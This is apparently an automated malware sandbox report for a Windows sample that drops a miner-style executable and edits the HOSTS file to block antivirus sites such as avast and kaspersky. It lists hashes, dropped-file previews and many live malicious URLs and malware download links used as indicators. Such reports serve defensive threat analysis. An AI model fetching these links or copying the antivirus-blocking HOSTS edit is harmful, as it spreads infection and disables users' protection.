17:42:15 | API Interceptor | 2521x Sleep call for process: svchost.exe modified
17:42:20 | API Interceptor | 1731x Sleep call for process: dialer.exe modified
17:42:25 | API Interceptor | 221x Sleep call for process: WMIADAP.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.199.109.133 | Dead By Daylight.exe | malicious | NovaSentinel |
 | https://www.kudoboard.com/boards/9yja32B2/ | malicious | HTMLPhisher, Tycoon2FA |
 | http://gpfkk.ktt55.my.id/ | malicious | HTMLPhisher |
 | https://www.etched.com/announcing-etched | malicious | Unknown |
 | https://dharaprajapati2.github.io/Netflix-clone | malicious | Unknown |
 | https://iamarunraghav.github.io/Project--Netflix-clone | malicious | Unknown |
 | https://www.canva.com/design/DAGKjIaIIOg/dnxUW38JksDdsGh-XKZQbw/edit?utm_content=DAGKjIaIIOg&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton | malicious | HTMLPhisher, Tycoon2FA |
 | https://github.com/blackcoffe74/blackcoffe74/releases/tag/lat | malicious | LummaC, BiFrost, LummaC Stealer |
 | https://prehelp.vercel.app/ | malicious | Unknown |
 | https://lnkd.in/edATmmaa | malicious | HTMLPhisher, Tycoon2FA |
140.82.121.3 | 6glRBXzk6i.exe | malicious | RedLine | github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
 | firefox.lnk | malicious | CobaltStrike | github.com/john-xor/temp/blob/main/index.html?raw=true
 | 0XzeMRyE1e.exe | malicious | Amadey, Vidar | github.com/neiqops/ajajaj/raw/main/file_22613.exe
 | MzRn1YNrbz.exe | malicious | Vidar | github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
 | RfORrHIRNe.doc | malicious | Unknown | github.com/ssbb36/stv/raw/main/5.mp3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | Dead By Daylight.exe | malicious | NovaSentinel | 185.199.109.133
 | Dead By Daylight.exe | malicious | NovaSentinel | 185.199.110.133
 | SecuriteInfo.com.Win32.MalwareX-gen.3895.3560.exe | malicious | Unknown | 185.199.108.133
 | SecuriteInfo.com.Win32.MalwareX-gen.3895.3560.exe | malicious | Unknown | 185.199.108.133
 | SecuriteInfo.com.Win64.Evo-gen.30371.21664.exe | malicious | Akira Stealer | 185.199.111.133
 | http://x3ifs.ktt55.my.id/ | malicious | HTMLPhisher | 185.199.108.133
 | SecuriteInfo.com.Win64.Evo-gen.30371.21664.exe | malicious | Unknown | 185.199.111.133
 | http://gpfkk.ktt55.my.id/ | malicious | HTMLPhisher | 185.199.109.133
 | UniGetUI.Installer.exe | malicious | Unknown | 185.199.111.133
 | UniGetUI.Installer.exe | malicious | Unknown | 185.199.108.133
github.com | Dead By Daylight.exe | malicious | NovaSentinel | 140.82.121.3
 | Dead By Daylight.exe | malicious | NovaSentinel | 140.82.121.3
 | cHNKEpg5PJ.jar | malicious | STRRAT | 140.82.121.3
 | https://help--wlletconnect.gitbook.io/us | malicious | Unknown | 140.82.121.4
 | https://www.kudoboard.com/boards/9yja32B2/ | malicious | HTMLPhisher, Tycoon2FA | 140.82.121.4
 | https://www.sciencebuddies.org/Handlers/QrCode.aspx?u=h%74%74%70%73%3a%2f%2f%77%65%61%70%6f%6e%78%62%61%6e%64%2e%63%6f%6d%2f%6d%703%2f&c=E,1,2ueN4Mj2php13GPksjFRG_hUZYHLWObd4Ucer7VGzLDz8Kun3RC-6YKOBSRIV6Kok50F_i4RonPCGZc0QPIvb37YvFC6np1XNEfPhtAX&typo=1 | malicious | HTMLPhisher, Tycoon2FA | 140.82.121.4
 | https://linktr.ee/54544hgtsrsdsgs | malicious | HTMLPhisher, Tycoon2FA | 140.82.121.4
 | ShareX-16.1.0-setup.exe | malicious | Unknown | 140.82.121.5
 | https://zzmc.tatateri.com/lPY0TK6A/#Mandrew.lapkin@innocap.com | malicious | HTMLPhisher, Tycoon2FA | 140.82.121.4
monerooceans.stream | MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip | malicious | Xmrig | 44.196.193.227
 | 17ae2fbf36a41622374adfd3b1608e08.10.dr | malicious | Unknown | 44.224.209.130
 | SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | malicious | Xmrig | 44.196.193.227
 | GoogleCrashHandler.exe | malicious | Xmrig | 44.196.193.227
 | yljlbesdmoas.exe | malicious | Xmrig | 44.196.193.227
 | GoogleCrashHandler.exe | malicious | Xmrig | 44.196.193.227
 | GoogleCrashHandler.exe | malicious | Xmrig | 44.224.209.130
 | vHAgn4Dx00.exe | malicious | AveMaria, UACMe, Xmrig | 44.224.209.130
 | vABMEuk0Ie.exe | malicious | Xmrig | 44.196.193.227
 | SecuriteInfo.com.W64.Rozena.HA.gen.Eldorado.22978.31544.exe | malicious | Xmrig | 44.196.193.227
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FASTLYUS | Dead By Daylight.exe | malicious | NovaSentinel | 185.199.109.133
 | Dead By Daylight.exe | malicious | NovaSentinel | 185.199.110.133
 | https://itaconsorciodigital.com.br/termosdeuso | malicious | Unknown | 151.101.1.229
 | https://useadobe.shop/ | malicious | Unknown | 151.101.194.137
 | https://bt-broadband-56137b-5027a8eef78863ed48b.webflow.io/ | malicious | Unknown | 151.101.1.229
 | https://lnky.ru/qqj9v | malicious | Unknown | 151.101.1.229
 | https://pub-d6d61a1c2aed4d8bbc46e0a32bfde07a.r2.dev/index.html | malicious | Unknown | 185.199.108.153
 | http://abhay-panchal-14.github.io/netflix | malicious | Unknown | 185.199.108.153
 | http://bcjaconski.wixsite.com/my-site | malicious | Unknown | 151.101.66.217
 | http://pub-dde186d3ef204edd89e847d256cdf5bd.r2.dev/ghupl.html | malicious | Unknown | 151.101.194.137
CLOUDFLARENETUS | NAtK3GR95V.exe | malicious | DCRat, PureLog Stealer, zgRAT | 188.114.97.3
 | Loader.exe | malicious | LummaC, Xmrig | 104.20.3.235
 | setup.exe | malicious | Unknown | 104.21.79.229
 | setup.exe | malicious | Unknown | 104.21.79.229
 | #U8acb#U6c42#U66f8.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.96.3
 | https://jc541gdi.r.ap-south-1.awstrack.me/L0/https:%2F%2Fapi.growthschool.io%2Fredirect%3Fredirect=https%253A%252F%252Foutskill-api.growthschool.io%252Fv1%252Fredirect%253Fredirect%253Dhttps%25253A%25252F%25252Fwebinar.growthschool.io%25252Flive%25252F269690%25253Fsignup%25253Dd4694f1d-e1f6-4ebc-81f9-ccf7f397c75f%2526propsGeneratorKey%253DwebinarCommsLinkClicked%2526job%253DtrackEvent%2526eventName%253DWebinar%252520Comms%252520Link%252520Clicked%2526trackingProps%25255Btemplate_id%25255D%253DoneHourBefore%2526trackingProps%25255Bcomms_channel%25255D%253Demail%2526trackingProps%25255Bcta_text%25255D%253DJoin%252520Stream%2526trackingProps%25255Bcta_type%25255D%253Dlive_session%2526trackingProps%25255Blink_clicked%25255D%253Dhttps%25253A%25252F%25252Fwebinar.growthschool.io%25252Flive%25252F269690%25253Fsignup%25253Dd4694f1d-e1f6-4ebc-81f9-ccf7f397c75f%2526webinarSignupId%253D2330725/1/01090190b18b243d-902569cd-4b19-4fb0-9d62-751dd82840dc-000000/eiZ4tO0LwZqkUm_KmdP3dz-yVLc=163 | malicious | Unknown | 104.22.65.157
 | s6ue6dcFAI.exe | malicious | Babadeda | 172.64.41.3
 | JblYqEneyY.exe | malicious | Babadeda | 172.64.41.3
 | DHL Waybill & Shipping Document.exe | malicious | Snake Keylogger | 188.114.96.3
 | s6ue6dcFAI.exe | malicious | Babadeda | 172.64.41.3
COGENT-174US | botx.mpsl.elf | malicious | Mirai | 154.54.88.68
 | DHL_AWB#6078538091.exe | malicious | FormBook | 154.62.105.138
 | 185.208.158.215-x86-2024-07-14T08_54_06.elf | malicious | Unknown | 38.177.156.242
 | 185.208.158.215-mips-2024-07-14T08_54_05.elf | malicious | Unknown | 149.44.241.36
 | BL.exe | malicious | FormBook | 154.41.249.52
 | OrderPI.exe | malicious | FormBook | 38.47.232.178
 | http://sherwoodhomeshow.com | malicious | Unknown | 38.180.60.246
 | jew.arm6.elf | malicious | Mirai | 38.112.234.61
 | jew.arm7.elf | malicious | Mirai | 38.64.166.29
 | jew.mpsl.elf | malicious | Mirai | 149.95.138.157
GITHUBUS | Dead By Daylight.exe | malicious | NovaSentinel | 140.82.121.3
 | Dead By Daylight.exe | malicious | NovaSentinel | 140.82.121.3
 | cHNKEpg5PJ.jar | malicious | STRRAT | 140.82.121.4
 | https://help--wlletconnect.gitbook.io/ | malicious | Unknown | 140.82.121.5
 | https://help--wlletconnect.gitbook.io/us | malicious | Unknown | 140.82.121.4
 | https://www.kudoboard.com/boards/9yja32B2/ | malicious | HTMLPhisher, Tycoon2FA | 140.82.121.4
 | https://www.sciencebuddies.org/Handlers/QrCode.aspx?u=h%74%74%70%73%3a%2f%2f%77%65%61%70%6f%6e%78%62%61%6e%64%2e%63%6f%6d%2f%6d%703%2f&c=E,1,2ueN4Mj2php13GPksjFRG_hUZYHLWObd4Ucer7VGzLDz8Kun3RC-6YKOBSRIV6Kok50F_i4RonPCGZc0QPIvb37YvFC6np1XNEfPhtAX&typo=1 | malicious | HTMLPhisher, Tycoon2FA | 140.82.121.4
                                                    https://linktr.ee/54544hgtsrsdsgsGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    • 140.82.121.4
                                                    ShareX-16.1.0-setup.exeGet hashmaliciousUnknownBrowse
                                                    • 140.82.121.5
                                                    https://zzmc.tatateri.com/lPY0TK6A/#Mandrew.lapkin@innocap.comGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    • 140.82.121.4
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 3b5074b1b5d032e5620f69f9f700ff0e
Avowed Beta.exe | malicious | XWorm | 185.199.109.133, 140.82.121.3
Drive.exe | malicious | XWorm | 185.199.109.133, 140.82.121.3
WaveInstaller.exe | malicious | XWorm | 185.199.109.133, 140.82.121.3
yvTs7wivyF.exe | malicious | RedLine | 185.199.109.133, 140.82.121.3
PC driver.exe | malicious | XWorm | 185.199.109.133, 140.82.121.3
EnuV7qEX01.exe | malicious | RedLine | 185.199.109.133, 140.82.121.3
217.exe | malicious | RedLine | 185.199.109.133, 140.82.121.3
Shipping Docs PO#QSB-8927393_2324, QSB-8927394_23-24.xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 185.199.109.133, 140.82.121.3
Orden de Compra.exe | malicious | GuLoader | 185.199.109.133, 140.82.121.3
https://itaconsorciodigital.com.br/termosdeuso | malicious | Unknown | 185.199.109.133, 140.82.121.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: C:\Windows\Temp\voeeoiqrjnla.sys
Loader.exe | malicious | LummaC, Xmrig
updater.exe | malicious | Xmrig
Setup.exe | malicious | Xmrig
Laun3cher_E@zy.exe | malicious | LummaC, Apollo, LummaC Stealer, Xmrig
daRNfwifay.exe | malicious | Xmrig
cherax.exe | malicious | Blank Grabber
K4gsPJGEi4.exe | malicious | Xmrig
32Vec0G7f5.exe | malicious | PureLog Stealer, Xmrig, zgRAT
BZMxi2zof1.exe | malicious | RedLine, Xmrig
file.exe | malicious | Xmrig

                                                                        Process:C:\Windows\SysWOW64\system64x.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2870272
                                                                        Entropy (8bit):6.525182750076353
                                                                        Encrypted:false
                                                                        SSDEEP:49152:fcFa11QV8HUsmZ00Mtju4/+Kej4Oehz0EA7GHk2D/CiVr8KmPfj7G4Lxec+DA:UA1ItsmZ00MBu4Ies7Gj/CAYKsrdFecD
                                                                        MD5:4471F946569BFA17D68108068D7A17A1
                                                                        SHA1:E16A100F0B1052120B13FFE59EF0E6A8DCFB0160
                                                                        SHA-256:CAD52FAF41B806A22F502E1937ED72637D013C3C964404D448FA7A5C0E48E56C
                                                                        SHA-512:F2ADC61D04F6B6792AD37E2230D7CCEBB6090B45423E95BB21D5BCEE09304A3203F15A9CEAE39E6E1537F035E79F1DDA3B8FC93D03F6984C6260044ED046BC17
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...V3be.........."......~...J+.....@..........@.............................0,...........`.....................................................<.............+.............. ,.x...............................(.......8..............p............................text....}.......~.................. ..`.rdata........... ..................@..@.data...@2+......"+.................@....pdata........+.......+.............@..@.00cfg........,.......+.............@..@.tls..........,.......+.............@....reloc..x.... ,.......+.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                         Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):4757
                                                                        Entropy (8bit):5.363658266795526
                                                                        Encrypted:false
                                                                        SSDEEP:96:iqbYqGSI6ogwmj0q0ajtIzQ0cxYsAmSvBjwQYrKxmDRtzHeqKkCq10tpDuqDqWi/:iqbYqGcLwmj0qjIzQ0JyZtzHeqKkCq1B
                                                                        MD5:73CA263A853CB35DB929B19BC593A5C4
                                                                        SHA1:01F272ED7D5A6AFEB3376C700F1887E686FE5127
                                                                        SHA-256:969C451B86A8874F3549CEB55D6A07D6C6C86A861AA027567B3EEF86E4483CCC
                                                                        SHA-512:29BF55FF62CFDB46899DC1C053122DDC3A17E13F5174420B5C39B71121FD0EA8247DC4C180317838ABD7817D3E896D238875CA1803F23519E5C39E8F6E56F7B6
                                                                        Malicious:true
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages

                                                                         Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1510207563435464
                                                                        Encrypted:false
                                                                        SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                        MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                        SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                        SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                        SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                        Malicious:false
                                                                        Preview:@...e.................................^..............@..........

                                                                         Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                         Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                         Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                         Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                         Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                         Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                         Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                         Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                         Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2870272
                                                                        Entropy (8bit):6.525182750076353
                                                                        Encrypted:false
                                                                        SSDEEP:49152:fcFa11QV8HUsmZ00Mtju4/+Kej4Oehz0EA7GHk2D/CiVr8KmPfj7G4Lxec+DA:UA1ItsmZ00MBu4Ies7Gj/CAYKsrdFecD
                                                                        MD5:4471F946569BFA17D68108068D7A17A1
                                                                        SHA1:E16A100F0B1052120B13FFE59EF0E6A8DCFB0160
                                                                        SHA-256:CAD52FAF41B806A22F502E1937ED72637D013C3C964404D448FA7A5C0E48E56C
                                                                        SHA-512:F2ADC61D04F6B6792AD37E2230D7CCEBB6090B45423E95BB21D5BCEE09304A3203F15A9CEAE39E6E1537F035E79F1DDA3B8FC93D03F6984C6260044ED046BC17
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...V3be.........."......~...J+.....@..........@.............................0,...........`.....................................................<.............+.............. ,.x...............................(.......8..............p............................text....}.......~.................. ..`.rdata........... ..................@..@.data...@2+......"+.................@....pdata........+.......+.............@..@.00cfg........,.......+.............@..@.tls..........,.......+.............@....reloc..x.... ,.......+.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                         Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1510207563435464
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlllul2lllllZ:NllUClll
                                                                        MD5:4D98AF7F487E62A9C1D44B02674BAB7E
                                                                        SHA1:1B492B2208949EB7F18C32F309C296B4258DBA65
                                                                        SHA-256:1E3ED9CE6343DA27C6759A0F05D6DD0B92B3A9C63B6492A2DA4E4F371D9F56DA
                                                                        SHA-512:60EC859B84836E865E767FE858E70ACEC6F0FB8077B2E51D6CB4095533433B791C9A16396D69279C7F896DF003A1ED6656087B43EFA16523DA4026317CBB49E6
                                                                        Malicious:false
                                                                        Preview:@...e.................................:..............@..........

                                                                         Process:C:\Windows\SysWOW64\system64x.exe
                                                                        File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):877
Entropy (8bit):4.691701573319544
Encrypted:false
SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTtvC:vDZhyoZWM9rU5fFceC
MD5:482630DE1D93C83F5A9381F85F638DC6
SHA1:BF4274FD755DA85041D43AEE02AEC7727A1D531A
SHA-256:CA8A2839801616AE1BA3F4F10CEF264EB17D83684433C0D7251BD101A6F35BEE
SHA-512:9D82D8662D1EAB19E34C6300BEA534291BEEFC8B2774381C6F2E0ACC495755D67A30E38B28458B76C15471DDB88F1A30B267AA944E80D575D968162F8E742770
Malicious:true
Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 www.avast.com kaspersky.com safing.io

Process:C:\Windows\System32\wbem\WMIADAP.exe
File Type:data
Category:dropped
Size (bytes):129304
Entropy (8bit):3.4053644175972018
Encrypted:false
SSDEEP:1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRto:XBnfw8ld9+mRDaUR28oV7TY+7S0bS
MD5:9AF42BB696EFC1BBDD22EE27988B26DE
SHA1:EC894667C90179CB8EE7EA08B39974EB30984877
SHA-256:06F0E20AA133D253C6F1551A7DEE48A9BDE83FE54DBA2EEF81EC7A20B5D7862F
SHA-512:39A07E7F021015D49C57672B92A39ABBEA59F33E025792FE83F73E5AF6DC31F1DB0F85D58CDC2C10E8ED50026B6A743207E4587EBED75A0B7C7625EABEB333DC
Malicious:false
Preview:1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.

Process:C:\Windows\System32\wbem\WMIADAP.exe
File Type:data
Category:modified
Size (bytes):697270
Entropy (8bit):3.2735341717803963
Encrypted:false
SSDEEP:3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRj:78M6d0w+WB62
MD5:DD78C325FDB07A0714C016FD6FE034CA
SHA1:A7758E36212A446040010A0A5A34DBCF2B822394
SHA-256:E146AD67B5E4CB731007F1AB70191C5AE0BA835E25E10F1D4BB61C7AA8459B42
SHA-512:EDDC0D47A747CB95EFF9B1721D12C53077A4C6F7E1395647AF6B8F83926B627EA67B477F4B0FD5ADFE364D8E852C0FAA55665E104D9B6E91391A9F0DC5D7622C
Malicious:false
